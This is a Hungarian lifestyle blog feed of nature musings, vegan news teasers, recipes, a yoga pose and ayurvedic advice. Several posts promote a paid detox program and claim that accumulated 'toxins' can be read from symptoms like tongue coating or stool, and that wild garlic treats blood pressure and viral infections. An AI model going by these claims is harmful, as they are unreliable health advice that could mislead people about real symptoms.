Varázslatos őszi égbolt és így októberre, találunk már színes, őszi ruhába öltözött fákat, bokrokat is:) Földiekkel játszó, égi tünemény... imádom a felhőket, ezeket a csodás tarka égi vándorokat, ezeket a vízcseppekből keletkező változatos csodákat. épp oly változatos és egyedi minden felhő, mint minden ember Nem csak a felhők alaptípusa, anyaga, alakja eltérő, de kiterjedése, színe, is eltérő és az égbolt, a színek, a fények, az évszakok mind, mind más, más látványt, élményt nyújtanak, A felhők nem csak gyönyörű látványt nyújtanak és fantasztikus élményt, de megmozgatják az ember fantáziáját, különböző érzéseket, érzelmi hatásokat tudnak bennünk létrehozni, elindítani... Volt már olyan, amikor hatalmas viharfelhő közeledett feléd fenyegetőn villámokat szórva? ugye milyen más, mint amikor egy kedves bárányfelhő, hófehér tejszínhab szerű rétege közelít? A felhők az elmét a jelenbe hozzák - nem tudod a felhők mozgását a múltban vagy a jövőben figyelni. Ahhoz, hogy kövesd a felhők mozgását a jelenben kell lenned. Sokszor tanácsolom olyanoknak, akiknek az elméje szanaszét van, csaponganak a gondolatok, hogy álljanak meg kicsit és kövessék a felhők mozgását, ez segít lecsendesíteni az elmét.
Állatvédelmi intézkedéssel szépítene a brit kormány
2023. október 6. Prove - a világ vegán szemmel
Egy új állatvédelmi intézkedés javít ugyan a brit kormány renoméján az állatvédők szemében, azonban még ez sem elegendő ahhoz, hogy feledtesse velük a környezetvédelmi hátraarcot. Idén ráadásul már el is vetett a kabinet egy állatjóléti törvénytervezetet. Mérföldkőnek számító törvényt fogadott el a turizmusban használt állatok védelmére az Egyesült Királyság kormánya. Az új törvény célja, hogy… The post Állatvédelmi intézkedéssel szépítene a brit kormány appeared first on Prove.hu.
Egyre kisebbek a halak, nem tudni, miért
2023. szeptember 29. Prove - a világ vegán szemmel
Egy több ezer állat- és növényfajt vizsgáló új kutatás szerint bizonyos fajok, főleg a halak egyedei évről évre egyre kisebbek. A Science folyóiratban megjelent tanulmány több mint 4000 gerinctelen, kétéltű, hüllő-, emlős- és növényfajról 1960-tól 2020-ig összegyűjtött adatokat elemzett. Az eredmények alapján arra jutottak, hogy sok fajnál igen változóak a testméret növekedésével vagy csökkenésével kapcsolatos… The post Egyre kisebbek a halak, nem tudni, miért appeared first on Prove.hu.
Hoztam nektek egy kis őszt
2023. szeptember 22. Élj harmóniában
Hoztam nektek egy kis őszt:) Az őszi szél módszeresen kezdi kiszárítani a fák, bokrok leveleit, virágokat, füveket.. egyre színesebb az erdő... Fantasztikus száraz falevél illat lengi be az erdőt, amely keveredik a fenyők mézédes gyantájával, ahogy az erős szél intenzíven összeturmixolja az illatokat és mindig más más keverési arányban próbálja velük elkápráztatni az ember érzékeit... A napsugarak megcsillannak a színes őszi faleveleken, a fák ágai között a sziklákon és a talajon az avaron. Igazi csoda szeptember közepén az is, hogy trikó nélkül lehet napozni, érezni ahogy a meleg napsugarak körbeölelik a testem. Mindig lenyűgöz a természetben a fények, színek, illatok formák változatos variációja A nap már ma is 18:50 körül ment le... a túrákat egyre korábban kell befejezni:, de azért szuper volt még ma is a Nagy Kevélyen vacsorázni. Holnap szombaton lesz az őszi napéjegyenlőség... mit is jelent ez... mostantól a nap folyamán a sötétebb órák hoszabbá válnak, mint a nappalok... belépünk a sötétebb időszakba:( elérkezik a befelé fordulás, visszavonulás ideje. Érdemes előre tudatosan felkészülni arra, hogy az elkövetkezendő hónapokat mivel és hogyan töltöd, ez a lelassulás, visszahúzódás ideje. Én már megannyi tanulnivalómat elkezdtem sorba rendezni és könyveket vettem sorra, amiket el szeretnék majd olvasni. Kedvenc téli elfoglaltságunk, amikor túrák képeit nézzük és képzeletben újra végigjárunk megannyi napsütötte erdei ösvényt:) ... és persze imádok sütni főzni... nyáron a sütőt nem kapcsolom be olyan gyakran, de télen kiváló a lakás melegítésére is és fantasztikus finomságokat lehet készíteni benne:) Addig is amíg beköszönt a teljes visszahúzódó időszak, amennyit csak lehet menj a természetbe, gyűjtsd be az élményeket, a szép látványt, a napfényt, az illatokat, a formákat, öleld a fákat, simogasd a leveleket, bokrokat, füveket... Csodás őszi napokat kívánok szeretettel Kati
Pónija miatt állna bosszút a farkasokon Ursula von der Leyen, az Európai Bizottság elnöke
2023. szeptember 15. Prove - a világ vegán szemmel
Uniós vizsgálat indult annak felmérésére, indokolja-e a farkasok kilövésére vonatkozó szigorú jogszabályok lazítását az európai populáció növekedése. Ursula von der Leyen szerint immár az állatállomány mellett az emberek is veszélyben lehetnek. Az Európai Bizottság (EB) elnöke, Ursula von der Leyen kihúzta a gyufát az uniós környezetvédelmi minisztereknél és az állatjogi aktivistáknál. Felvetette ugyanis, hogy felül… The post Pónija miatt állna bosszút a farkasokon Ursula von der Leyen, az Európai Bizottság elnöke appeared first on Prove.hu.
Őszi tisztítás, nagytakarítás, méregtelenítés
2023. július 29. Élj harmóniában
Őszi tisztítás, nagytakarítás, méregtelenítés Szabadulj meg a nyár során felhalmozódott salakanyagoktól Erősítsd meg az immunrendszered és készülj fel a hidegebb évszakra! Ahogy az otthonodban is végzel rendszeresen nagytakarítást, úgy a szervezetednek is szüksége van időről, időre arra, hogy megfiatalodhasson, megtisztulhasson. Tapasztaltd meg az életenergiád növekedését, a jó emésztést, a motiváltság érzését, a könnyedséget, a tiszta gondolatokat a szebb bőrt. Segítségünkkel részt vehetsz egy csodás otthoni 28 napos tisztító programban, ahol napról, napra támogatunk Téged az előkészítésben, a tisztulásban és a visszatérésben. Kinek ajánlott? Mindenkinek aki szeretné magát jobban érezni a bőrében vagy tenni szeretne egészségéért. Különösen ajánlott az alábbi esetekben fáradság, kimerültség emésztési zavarok ( puffadás, székrekedés, gázok, gyomorégés, étkezés utáni fáradtság) szezonális allergia alvászavar sóvárgás, érzelmi evés csökkent étvágy vagy teljes étvágytalanság gyakori megbetegedés - legyengült immunrendszer nyálka felhalmozódás - megfázás, orrdugulás, mellkasi lerakódás fájdalmak izmokban, ízületekben motiválatlanság erős testszag libidó csökkenés lelassult gondolkodás, koncentráció zavar nincs jó tisztánlátás, nehéz dönteni, kétségek Gyere, és csatlakozz Te is az ŐsziTisztitó programhoz ! Bővebb információ és regisztráció: https://www.eljharmoniaban.hu/tisztitas #megfiatalodás #fiatalodás #tisztulás #nyár #ősz #tisztítókúra #egészségmegőrzés #méregteleníté
Honnan tudod, hogy vannak toxinok a szervezetedben
2023. július 20. Élj harmóniában
Honnan tudod, hogy vannak toxinok a szervezetedben és itt az idő egy kis tisztításnak? Tudatosítsd a közérzeted. Ha reggel is fáradtan ébredsz, kimerültnek, elnehezültnek, lustának érzed magad, kedvetlen vagy és motíválatlan. Figyeld meg az emésztésed. Ha van puffadás, gáz, savasodás, böfögés, gyomorégés, székrekedés, hasmenés, görcsök. Figyeld meg a székleted. Ha nyálkás, nyomot hagy a wc-ben, ragadós, bűzös. Figyeld meg a vizeleted. Ha büdös, elszíneződik. Figyeld meg az izzadságod. Ha elszíneződik, foltot hagy a ruhán vagy büdös. Tudatosítsd a mentális állapotod. Ha tompa az elméd, gyengült a koncentrációs képességed, úgy érzed nem látsz tisztán, sokat kételkedsz. Nézd meg a nyelved ébredés után. Ha van rajta lepedék, akkor van a szervezetedben felhalmozódott salakanyag. Figyeld meg az ízületeidet. Ha fájdalmak vannak az ízületekben. Figyeld meg az étvágyad és az ételekhez való viszonyodat. Ha nincs étvágyad, semminek nincs igazán jó íze. Figyeld meg a testérzeteidet. Ha vannak dugulások, telítettség arcüregben, belekben. Figyeld meg az immunrendszered. Ha könnyedén elkapsz mindenféle betegséget. Ha úgy érzed szeretnél megszabadulni a tél során felhalmozódott salakanyagoktól, hogy eljött az idő a testi, mentális és érzelmi tisztításra, akkor csatlakozz az Otthonii Őszi Tisztítás Online Programhoz. augusztus 15-ig kedvezményes befizetés https://www.eljharmoniaban.hu/tisztitas #tisztítás #méregtelenítés #zavarodottság #emésztésizavar #gondolkodás #érzelmek
Nincs felhő az égen
2023. július 11. Élj harmóniában
július 11. nincs felhő az égen és minden párás.... Benne vagyunk a nyárban és ez már azaz igazi nyár... az üde zöld tájak, rétek kezdenek elsárgulni, már nincs annyi színpompás virág, a természet egy kissé megfakul... A nagy melegben a fenyőgyanta csodálatos, mézédes illata lengi be a tájat... imádom ezt az illatot.... ilyenkor lassan haladok tovább az ösvényen, szeretném ha ez a pillanat örökké tartana és próbálok annyit magamba szívni ebből a mennyei illatból, amennyit csak a memóriám el tud tárolni:) A természet lenyűgöző, változatos, minden érzékszervet lefoglaló csoda #kirándulás #nagykevély #nincsfelhő #természet
Nyári meggyleves, főzés nélkül
A gyümölcsleves vagy meggyleves számomra egy problémás étel. Azért, mert nagyon szeretem, de aztán elkészítem és még fél napot kell várni, hogy kihűljön, márpedig nyáron a behűtött gyümölcsleves az igazi. Ebből aztán elegem lett, gondoltam egyet és csináltam egy főzés nélküli, nyári változatot, amit elég csak egy órára a hűtőbe tenni. Hozzávalók: 40 dkg magozott meggy 5 dl kefír 4 ek nádcukor (vagy más édesítőszer) A meggy felét a kefírrel és a nádcukorral krémesre turmixoljuk. Ha túl sűrű, egy kevés vízzel higítjuk. Jól lehűtjük, tálalásnál pedig a megmaradt meggyből teszünk a turmixolt levesbe. Kedvünk szerint ízesíthetjük egy csipet őrölt fahéjjal vagy frissen reszelt citromhéjjal.
Gluténmentes, tojásmentes, tejmentes mandulás sütemény
2023. június 2. Eszemiszom – Jóga Magazin
Tél, december, karácsony
Ilyenkor az egyik legideálisabb alapanyag a süteményekhez a dió és magfélék. Ezek táplálók, tele vannak értékes vitaminokkal, nyomelemekkel, ásványi anyagokkal és még a fehérje tartalmuk is elég magas.
A karácsony általában elképzelhetetlen ilyen édességek nélkül. Jómagam nem igazán szeretem a bejglit és bonyolult elkészíteni is. Jobban szeretem az egyszerű dolgokat, ezért ma egy egyszerű süteményt készítettem. A magfélék, diófélék közül pedig a mandula a lehető legjobb választás az ájurvéda és az egészségmegőrzés szempontjából
Arról miért is érdemes mandulát fogyasztani itt olvashatsz bővebben
Ez a mandulás sütemény tepsiben is készíthető, de én most muffin formában csináltam meg, mert így szép kis darabos süteményeket kapok és nem kell a szeleteléssel csem foglalkozni.
Gluténmentes, tojásmentes, tejmentes mandulás sütemény
Hozzávalók
1,5 bögre hajdinaliszt
0,5 bögre kukoricaliszt
1 bögre kókuszcukor (teljes értékű nádcukorral helyettesítheted)
1 csg. sütőpor
vanília
fahéj
6 ek. kókuszolaj
1 bögre darált mandula
kb 1,6 bögre víz
Vegyszermentes (bio) alapanyagokat használj!
Keverd össze a száraz hozzávalókat egy tálba. Majd öntsd hozzá a kókuszolajat és a vizet. Ha a kókuszzsír meg van dermedve én forró vízzel szoktam leönteni és amikor szépen elolvadt a vízzel együtt öntöm a tésztába.
Néhány lágy mozdulattal dolgozd össze a tésztát. A muffin készítés egyik titka, hogy soha ne kevergesd hosszan a száraz összetevőket a nedvesekkel és ne hagyd sokáig állni. Ha kevés a folyadék akkor tegyél még hozzá annyit, hogy a tészta lágy legyen. Majd adagold a tésztát a muffin formába. Én muffin papírral szoktam a formát kibélelni, de vajjal és liszttel is megteheted. Tedd 180 fokra előmelegített sütőbe és süsd készre (kb. 20-25 p).
Ha szeretnél az Egészséges és tudatos táplálkozásról többet tudni, szeretettel várlak Egészséges táplálkozás és főzőtanfolyamomra.
https://www.eljharmoniaban.hu/tudatos-taplalkozas
Jó évágyat kívánok:)
szeretettel
Kati
Fair Trade világnap + jeges kávé cukormentesen, de édesen! (laktózmentes, gluténmentes, vegán)
2023. május 13. Zizi kalandjai
Minden évben megtartják a Fair Trade világnapját május második szombatján. Ezzel a világnappal igyekeznek felhívni a figyelmet a kistermelők, a környezet kizsákmányolására, a globális kereskedelemre és a túlfogyasztás hátrányaira. De mit is jelent a Fair Trade kifejezés? Mi van mögötte? Szó szerint fordítva méltányos kereskedelmet jelent. “A méltányos kereskedelem lényege... Source
Ájurvédikus tanácsok májusra
2023. április 28. Élj harmóniában
Május legfontosabb ünnepe, az Anyák napja. amit a természet is ünnepel csodálatos szépségekkel.) Én is nagy szeretettel köszöntök minden Édesanyát:) Májusra minden virágba borul. Csodálatos zöldellő tájak, illatozó virágok, fák... orgona, jácint, jázmin, liliom, japán lonc, akác, hárs és még hosszasan sorolhatnám májusban miféle varázslatokkal találkozhatunk. Nem csak a növények, de a madarak, bogarak is beindulnak... mindenhol madárcsicsergés és a rovarok zsongása, zümmögése hallható. Májusban már sokat lehetünk a szabadban, mert a hőmérséklet folyamatosan emelkedik és a napsütéses órák száma is egyre nő. Itt az ideje kirándulni, sétálni, piknikezni. Szánj időt arra, hogy élvezd a májusi varázslatot. Légy tudatosan jelen a pillanatban... élvezd a szép tájat, hallgasd a szél susogását, a madarak énekét, élvezd a megannyi édes, különleges illatot. Töltekezz a sok szép élménnyel. A májusban nem csak növényvilágban és az állítvilágban indítja be a természet a nyüzsgést, de az emberi szervezetben és szívekben is. Észreveheted, hogy megnő az életenergiaszinted. A május, mondják a szerelem hónapja is. Májusban az emberek szíve is jobban megnyílik, a legtöbben tapasztalják magukon, hogy szívesebben mennek társaságba, megnő a lelkesedés programokra, önfejlesztésre, tanulásra, kimozdulni otthonról, találkozni másokkal. Ájurvédikus szempontból, azzal, hogy nő a hőmérséklet, nő a testben a tűz elem, a hő is. Akinek amúgy is sok a tűz elem a testében, (pitta típusúak), májusban, júniusban emelkedhet a kritikai hajlam, türelmetlenség, düh, ingerültség az emberekben. A felszaporodó hő miatt, a májusi időszak már kedvez a gyulladásos betegségeknek (bélgyulladás, fogászati gyulladások, bőrgyulladások), kellemetlen bőrtübeteketnek (kiütések, viszketés) A nedves, hűvös évszakból, és az áprilisi változékony időjárásból, egyre inkább tartós melegre számíthatunk májusban. Ahogy az idő melegszik, megváltozik az is, hogy a szervezeted számára mi az ami támogató, ideális. Május hónap egy utolsó lehetőséget kínál mielőtt beindul a nyár, hogy megtisztítsd a szervezetedet a tél során lerakódott salakanyagoktól. Május végétől, amikor túlmelegszik a test, már nem ajánlott tisztítást végezni. Május 6-ig tudsz regisztrálni a Tavaszi Tisztítás Programunkra. https://www.eljharmoniaban.hu/tisztitas Hogy májusban is egészséges és kiegyensúlyozott legyél érdemes néhány egyszerű változtatást beépíteni az étrendedbe és az életmódban. Annak érdekében, hogy a tested ne melegedjen túl, kerüld a mentális és fizikális túlterhelést, a tűző napon való fizikai aktivitást, sportot, kertészkedést. Próbálj árnyékban lenni vagy a délelőtti vagy késő délutáni órákra időzíteni a szabadban végzett aktivitást. Növeld meg a folyadékbeviteledet - ha izzadékony vagy, akkor egy csipet sót és esetleg egy kis lime levet is adhatsz a vizedhez. A jógagyakorlásodban, részesítsd előnyben a pitta harmonizáló gyakorlatokat. A Jógastúdióban fokozatosan térünkát majd a pitta kiegyenlítő gyakorlásokra. A táplálkozásodban érdemes a szezonalitásnak megfelelően változtatni. Kezd el fogyasztani az új friss zöldeket, saláták, retek, rukkola, cikória, etc Májusban már sokféle zöldséget fogyaszthatunk, mángold, spárga, újkrumpli, friss sárgarépa. új cékla, zöldborsó, spenót, sóska, petrezselyem, brokkoli, karfiol, zöldbab, káposzta, édeskömény, A gyulladások elkerülése érdekében, kezdhetsz hűsítő ételeket is fogyasztani, mint a friss korinader, uborka, avokádó, cukkini, kókusz, menta.Kiváló ilyenkor az Aloe lé is. A koriander egy fantasztikus gyógynövény. Kedvező hatásairól a blogon olvasthatsz: http://eljharmoniaban.blogspot.com/2015/04/miert-jo-koriander.html Májusban végre a szabadban érnek már gyümölcsök is... eper, áfonya, sorra jönnek a bogyósok. Élvezd a friss gyümölcsök ízét, hidratáló, és tisztító hatását. A melegítő gabonákat, most érdemes mérsékelni és helyette árpát, baszmati rizst, quinoa kezdj fogyasztani nagyobb mennyiségben. Gyönyörű májusi napokat kívánok :) szeretettel:KAti
,,Hússal etetem a gyermekemet, annak ellenére, hogy vegán vagyok – Azt akarom, hogy ő maga döntsön erről”
Az édesanya azt mondja, annak ellenére, hogy a párjával mindketten vegán étrendet követnek, a kisfiuk étrendjébe a húst is beiktatták, mert azt akarják, hogy ő maga döntsön ezzel kapcsolatban, ha már nagyobb lesz. Jennifer Sizeland azt mondja, ő maga 13 évesen döntött úgy, hogy vegetáriánus lesz, de az édesanyja ragaszkodott hozzá, hogy továbbra is egyen […] The post ,,Hússal etetem a gyermekemet, annak ellenére, hogy vegán vagyok – Azt akarom, hogy ő maga döntsön erről” appeared first on Filantropikum.com.
Nyers-vegán diós bejgli (gluténmentes)
Nem csak karácsonykor, de húsvétkor is sok helyen kerül az asztalokra bejgli vagy kalács. Akik szeretik a bejglit, de inkább növényi alapokon kívánják elkészíteni, azoknak se kell szomorkodni, egy nyers almalapból (amit bizonyos sütőkben is el lehet készíteni nyitott ajtóval) és datolyás vagy mazsolás diómasszával el lehet készíteni. Napjaink fejlett konyhatechnikája és a nyers étkezést folytatók leleménye meghozta a bejglit a nyers (élő, sütés nélküli) sütemények világába is. Rendkívül előnyös, hogy a "tésztáját" akár hetekkel, hónapokkal előre elkészítheted. Nekem 3-4 hónapot várakozott az egyik lap (száraz helyen), mire oda jutottam, hogy megtöltöttem, felcsavartam. Nem lett semmi baja. El is fogyott. Másik előnye, hogy ha már van hozzá lapod, amit megtöltesz és feltekersz, szintén eláll akár egy hétig is (hacsak nem fogy el). Harmadik előnye, hogy egészséges, mivel csak rostokat tartalmaz, a benne lévő természetes cukrok felszívódása sem olyan gyors mint pl. a hagyományos bejglié. Negyedik előnye, hogy sokkal kevesebb időt kell eltölts vele, mint a hagyományos bejglivel, hiszen az aszalás ha időigényes is, de nem kell ott állj, várj, hanem közben millió dolgot elvégezhetsz, vagy akár aludhatsz is (ha éjszaka aszalsz). Nem kell megijedni a folyamattól, csak bele kell kezdeni és az aszalás ideje alatt kedvünkre választhatunk más tevékenységet.
A recept
Hozzávalók a "tésztához":
- 4-5 szem alma (kb. 50 dkg)
- kevés víz
- Opcionális: 1 vagy 2 banán ha édesebb "tésztát" szeretnénk
- Opcionális: 1/2 citrom leve ha világosabb "tésztát" szeretnénk
Elkészítés:
Az almákat meghámozzuk (a héjukat felhasználhatjuk müzlibe, vagy akár meg is ehetjük hámozás közben), apró darabokra vágjuk és egy turmixgép poharába tesszük. Magjait és magházát ne adjuk hozzá. Nagyon kevés vizet öntünk rá majd sűrű masszává turmixoljuk. Ahogy a hozzávalóknál írtam, banánt és vagy citromot adhatunk hozzá. Én csak almát és vizet használtam. Kb. fél cm vastagon elkenjük az aszaló lapon. Ha nincs aszalógép, se tálca hozzá, akkor egy tepsibe egy szilikonlapot fektetünk, arra öntjük rá a masszát, nyitott sütőt 50 fokra állítva hosszas órák alatt (8-10-12) megaszaljuk. Az aszalási idő függ attól, hogy mennyire vastag lapot készítünk. Sajnos sütőpapírt nem ajánlhatok ehhez a művelethez, mert összeráncosodik és nem lesz sima az almalap. Nehéz lesz leszedni róla. Ha szilikon lapon aszaljuk, akkor a végeredmény egy enyhén rugalmas almalap lesz.
Hozzávalók a diós töltelékhez:
- 15 dkg dió (beáztatva, megszárítva)
- 1 maroknyi datolya
- 1 bio citrom reszelt héja
- 1/2 citrom leve
Elkészítés:
A diót érdemes 1-2 nappal előtte elkészítenünk: diót kevés vízben (épp csak ellepje) 8 órára (legalább) beáztatjuk, majd leszűrjük, kiterítjük és ahogy az almalapot megaszaltuk, hasonlóan megszárítjuk, vagy fűtőtestre rakjuk a tálcát és ott szárítjuk. A datolyát kevés kézmeleg vízben felpuhítjuk (ha nem puha), majd aprító géppel összedaráljuk. A megszáradt, megdarált diót pedig összekeverjük a datolyaszósszal. Ha nem elég kenhető, túl száraz, akkor kevés citromlét kanalazunk hozzá. A dió áztatásával aktiváljuk a bennük rejlő fitinsavat, így a dióban lévő ásványi anyagok felszívódása könnyebben megy végbe és gyomrunknak is könnyebbé válik az emésztése. Persze enélkül is elkészíthető.
Tulajdonképpen ha a lapok már készen vannak, akkor a beigli elkészítése 10-15 perc, hiszen a megaszalt almalapra elegyengetjük a diós tölteléket, majd akárcsak egy bejglit, felcsavarjuk. Érdemes 1-2 órát állni hagyni, mivel a szeletelés könnyebb lesz, ennyi idő alatt az almalap kissé felpuhul. Ha kedvet kaptál hozzá, de inkább mákosan készítenéd el, annak a receptjét is megtalálhatod blogomon. :)
Gluténmentes zöldséges lepény
2023. március 25. Élj harmóniában
Szeretek sütni... süteményt, muffint, pogácsát és persze lepényeket. A lepényeket, akárcsak a bögrés sütiket, muffinokat nagyon szeretem, mert gyorsan, könnyen elkészíthetőek, nem kell sokat bajlódni a mérlegeléssel. Ma egy tápláló, egészséges gluténmentes lepényt készítettem. Gluténmentes zöldséges lepény Hozzávalók 1 púpos csésze rizsliszt 1 púpos csésze csicseriborsóliszt 3/4 csésze olívaolaj 1 csomag sütőpor só vegyesen fűszerek ízlé szerint ( k urkuma, asafoetida (hing), koriander, római kömény, gyömbér) Csinálhatod olaszosra is ( bazsalikom, oregánó, feketebors, kakukkfű, rozmaring) 1,5 - 2 bögre víz 1 púpos csésze brokkoli 1 púpos csésze édeskömény Vegyszermentes (bio) alapanyagokat használj! Az előkészítéshez mosd meg a brokkolit és az édeskömény gumót és vágd kisebb darabokra. A liszteket , sütőport, fűszereket keverd össze egy tálba, majd tedd hozzá az olajat és önts hozzá a vizet fokozatosan. Annyi vizet tegyél hozzá, hogy a palacsintatésztánál sűrűbb tésztát kapj, de elváljon szépen az edény falától. Keverd jól el. Keverd hozzá a zöldségeket, majd a masszát öntsd egy sütőpapírral bélelt, vagy kivajazott, lisztezett tepsibe. Tedd a sütőbe és kb. 180 fokon süsd addig, amíg jól átsül.(kb. 30 p) Ha szeretnél az Egészséges és tudatos táplálkozásról többet tudni, szeretettel várlak Egészséges táplálkozás és főzőtanfolyamomra. https://www.eljharmoniaban.hu/tudatos-taplalkozas Jó étvágyat kívánok:) szeretettel: KAti
Medvehagyma főzelék (vegán)
Ha tavasz és kirándulás, akkor medvehagyma szedés! Nagy szerencsénkre és örömünkre közeli erdőben medvehagyma rét terül el, így minden tavasszal gyakran kijárunk oda medvehagymát szedni. Rendkívül egészséges étel, amit számtalan módon el lehet készíteni. Spenóthoz hasonlóan főzeléket is készítettem már belőle, nagyon hasonlít kinézetre és ízre is a spenótra, éppen csak az íze jó medvehagymás. Nevét talán onnan kapta, hogy á llítólag ezt a növényt majszolják a mackók elsőként a téli álomból való felébredés után. Intenzív fokhagymás illata segít megkülönböztetni a gyöngyvirágtól. Ha bármikor nem tudod eldönteni, csak szagold meg a szárát, levelét ott, ahol eltörted és máris érezni fogod, hogy ez bizony fokhagymás illat vagy nem. Ha jó kis fokhagymára hasonlító illata van, minden bizonnyal medvehagymát találtál. Ha már virágzó medvehagymát találtál, akkor végképp könnyű megkülönböztetni, hiszen a gyöngyvirágnak gyöngyhöz hasonló virága van, míg a medvehagymának - ahogy a lenti képeken is látod, 5-6 fehér szirom adja a virágát.
Gyógyhatását tekintve, méregtelenítő, immunerősítő, vérnyomáscsökkentő, vérzsír csökkentő, gyomorbetegségekre is jó hatással van, emellett felső légúti megbetegedések, vírusos légúti fertőzések ellen is jó orvosság.
A recept
Hozzávalók:
- egy jó nagy adag frissen szedett medvehagyma
- só
- víz
- 3-5 dl növényi tej (medvehagyma mennyiségtől függően)
- 3-5 evőkanál étkezési keményítő
Elkészítés:
A medvehagymát megmossuk, majd felaprítjuk, edénybe tesszük, az aljára egy kevés vizet öntünk, hogy oda ne égjen, majd enyhén megsózzuk és elkezdjük párolni. Közben 1 dl hideg növényi tejet kikeverünk kb 3 evőkanál étkezési keményítővel. A félig megpárolódott medvehagymát felöntjük annyi növényi tejjel, hogy éppen csak ellepje, majd amikor már forrni kezd, behabarjuk a csomómentesre kevert étkezési keményítővel.
Élj harmóniában - az egészséges, kiegyensúlyozott élet 7 alapja
2023. március 14. Élj harmóniában
Talán már Te is rájöttél az egészség, a kiegyensúlyozttság nem érhető el valamiféle tabletta bevételével, egy klassz szlogennel, eg y menő gyakorlat elvégzésével. Az egészséged nem nagy dolgokon múlik, hane m szokásaid eredménye. Szeretettel nyújtjuk át az Élj harmóniában koncepciót, amely megmutatja Neked az egészséghez, a harmonikus élethez vezető út alapjait. Az Élj harmóniában koncepció az egyén test - lélek - elme egységét helyezi a középpontba és az ájurvéda és jóga csodás tudásán alapul. Ezt a koncepciót több mint 20 év szakmai tapasztalattal, több ezer tanított emberrel, több mint 500 megtartott tanfolyammal, több mint 50 megtartott elvonulással a hátunk mögött és megannyi saját megvalósítással dolgoztuk ki. Élj harmóniában - az egészséges , kiegyens úlyozott é let 7 alapja Táplálkozás A megfelelő táplálkozás segít, hogy tele legyél energiával, egészséges legyél és biztosít minden szükséges tápanyagot a szervezetdnek és békés elmét eredményez. Nem csak az elfogyasztott étel minősége, de az is fontos, hogy az emésztésed jó legyen, és jól fel tudd dolgozni amit ettél. Testmozgás Felszabadítja a tested, energetizál, rugalmassá, stabillá és erőssé tesz. Az ideális testmozgás megszünteti a feszültségeket és felszámolja a testedben a blokkokat, merevséget és életre kelti a tested. Légzés A légzés az életben maradás feltétele. A megfelelő légzés békéssé teszi az elméd, energiával tölt fel és jó egészséget biztosít. Nem csak a légzőszervrendszeredre hat kedvezően, de az emésztésedre, hormonrendszeredre, keringésedre is. Életmód A tested önregeneráló képességének támogatása szokásaidban rejlik. A saját alkatodnak megfelelő napirend, a jó időzítés az energiszinted növekedését, a szervezeted könnyedségét és jó egészséget biztosít a hétköznapjaidhoz. Belső béke A belső csend megteremtése megszabadít a stresszt ől, szorongástól, feszültségektől és közelebb kerülhetsz Önmagadhoz, megtapasztalhatod a gondolatok elcsendesedését és a béke képletét. Környezet Minden ami körülvesz hatással van Rád, az érzelmeidre, a mentális állapotodra, az emésztésedre, a testedre, egész lényedre. Amikor megfelelő attitűddel kapcsolódsz a téged körül vevő dolgokkal, mint a természet vagy az emberek akik körül vesznek, az elősegíti jól létedet. Pozitív gondolkodás A gondolataid hatást gyakorolnak fizikális, mentális és érzelmi állapotodra. Amikor megérted a világ működését, a karma törvényét és a történések mögötti mozgató energiákat, egy új szemléletben láthatod mindazt ami veled és körülötted történik. Élj harmóniában - az egészséges, kiegyensúlyozott élet 7 alapja segít rávilágítani arra, hogy néhány apró dologra odafigyelve, néhány szokásod megváltoztatásával hatalmas és csodálatos változásokat tapasztalhatsz az életedben. Adj egy esélyt M agadnak! Vezess be néhány apró változást az életedbe, hogy jobban érezd Magad! Az ájurvéda alapja az önismeret, önmegfigyelés... figyeld meg Magadon egy táplálkozási tanács, egy étel, valamilyen testmozgás, etc. hogyan hat rád... utána hogy érzed magad... fizikálisan, mentálisan, érzelmileg. Az Élj harmóniában füz etben néhány egyszerű, praktikus tippet adunk ahhoz, hogyan tudod megtapasztalni a kiegyensúlyozottabb élete t. Ha szeretnéd tudni, mik az Élj harmóniában koncepció alapjai, érdekelnek az egyszerű praktikák amivel csökkentheted a stresszt, javíthatod az emésztésed, növelheted az energiaszinted töltsd le az ingyenes Élj harmóniában füzetet, a weboldalunkról. https://www.eljharmoniaban.hu/eljharmoniabankoncepcio Élj harmóniában! Ismerd meg Te is az e gészséghez, testi - lelki jól léthez vezető utat! Ha szeretnél további hasznos tippeket, recepteket, információkat iratkozz fel hírlevelünkre és csatlakozz a Facebookon az Élj harmóniában - megújulás, egészség, életmód csoportunkhoz. https://www.facebook.com/groups/189231931805348
Emésztést segítő, tisztító tea
2023. február 15. Élj harmóniában
Az ájurvédában gyakran használják együtt az édesköny, koriander, római kömény kombinációt. Mindegyik gyógynövényről és jótékony hatásairól külön olvashatsz a blogon. Ezek a gyógynövények kiválóan segítik az emésztést, támogatják a szervezetben a méreganyagok eltávolítását mert felgyújtják az agnit anélkül, hogy túlságosan hevítenének - fokoznák a pittát. Ha úgy érzed szeretnéd a szervezetedet megszabadítani a felgyült salakanyagoktól, szeretettel látlak az általam vezetett otthoni online tisztítás programra, ahol napról, napra kísérlek végig egy csodálatos ájurvédikus tisztításon. Tapasztald meg a könnyedséget, a jó emésztést, a zavartalan, tiszta gondolatokat. https://www.eljharmoniaban.hu/tisztitas Ha nem szertél minden alkalalommal adagokat mérni, keverd össze egyenlő arányban a 3 gyógynövényt és utána a keveréked használd:) Hozzávalók 1/3 tk édesköménymag 1/3 tk koriandermag 1/3 tk római kömény 1 csésze víz A vizet egy edénybe a fűszerekkel forrald fel. Ha felfort vedd le a tűzről és fedd le. Hagyd állni lefedve 5 percig. Utána leszűrheted és fogyaszathatod is. Tetszés szerint édesítheted. Ha szeretnél az Egészséges és tudatos táplálkozásról többet tudni, szeretettel várlak Egészséges táplálkozás és főzőtanfolyamomra. https://www.eljharmoniaban.hu/tudatos-taplalkozas Egészségedre:) szeretettel KAti
Tégy a gerinced egészségéért! - Ekapáda-prasarászana (Egylábas hátranyújtás)
2023. február 7. Élj harmóniában
Ekapáda parasászana - Egylábas hátranyújtás Ez a póz rugalmasan tartja a esteed, kiválóan kompenzálja az ülőmunka hatásait. Lazítja, nyújtja a csípő körüli területet elsődlegesen a csípőhorpasz izmot (iliopsoas) és erősíti a stabilizáló izmokat. Rendszeres gyakorlása segít a helyes testtartás kialakításában - mind a nyak, vállöv területén, mint a deréktáji szakaszon. Ezzel a pózzal nem csak izmokat, de a fasciát is szuper jól tudod nyújtani. Gerincbetegségek esetén a kezdő változata, ahol hátul a térdek a talajon vannak nélkülözhetetlen. Felfrissít, az elmét aktívvá teszi a gyakorlót . Energetizálja a belső szerveket (máj, gyomor, lép, hasnyálmirigy) javítja az emésztést, hatékony székrekedésnél is. , kedvezően hat a húgyúti szervekre és a légzésedre is. Hogyan végezd el? - Helyezkedj el négykézláb tartásban Mardzsarászanában (amiről egy korábbi bejegyzésben már írtam). - Lépj előre a jobb lábaddal úgy, hogy a kéz és lábujjak egy vonalba 